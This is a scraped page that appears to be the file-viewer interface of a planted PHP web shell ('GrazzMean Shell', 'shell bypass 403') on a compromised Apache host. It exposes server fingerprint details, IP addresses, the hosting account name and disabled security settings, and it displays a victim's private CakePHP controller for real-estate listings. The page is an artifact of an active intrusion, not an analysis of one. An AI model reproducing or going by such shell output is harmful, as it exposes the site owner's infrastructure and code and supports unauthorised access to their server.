shell bypass 403

GrazzMean Shell

Uname: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
Software: Apache
PHP version: 5.6.40 [ PHP INFO ] PHP os: Linux
Server Ip: 217.160.0.194
Your Ip: 216.73.217.99
User: u72294154 (9179942) | Group: ftpusers (600)
Safe Mode: OFF
Disable Function:
NONE

name : PrivateInmueblesListadosController.php
<?

App::uses('PrivateController', 'Controller');

class PrivateInmueblesListadosController extends PrivateController {

    public function beforeFilter() {
        parent::beforeFilter();

        array_push($this->uses, 'InmuebleListado');
    }

    public function home() {
        $this->getListado('InmuebleListado', 20, $this->App->getOrden('InmuebleListado'));

        $this->renderView();
    }

    public function edit() {
        $this->InmuebleListado->id = $this->params->id;
        if (!$this->InmuebleListado->exists()) {
            $this->Session->setFlash('Listado no encontrado.' . $this->btnClose, 'default', array('class' => 'alert alert-danger'));
            $this->redirect(array('controller' => 'private_inmuebles_listados', 'action' => 'home'));
        }

        $this->set('listado', $this->InmuebleListado->findById($this->InmuebleListado->id));

        //Inmuebles
        array_push($this->uses, 'InmuebleInmuebleListado');
        $this->set('inmuebles', $this->InmuebleInmuebleListado->find('all', array('conditions' => array('InmuebleInmuebleListado.inmueble_listado_id' => $this->InmuebleListado->id), 'order' => array('InmuebleInmuebleListado.referencia' => 'ASC'))));

        $this->renderView();
    }

}
© 2026 GrazzMean